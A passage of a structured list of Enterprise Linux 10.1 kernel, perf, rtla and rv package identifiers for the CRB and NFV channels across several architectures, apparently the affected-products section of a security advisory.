"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
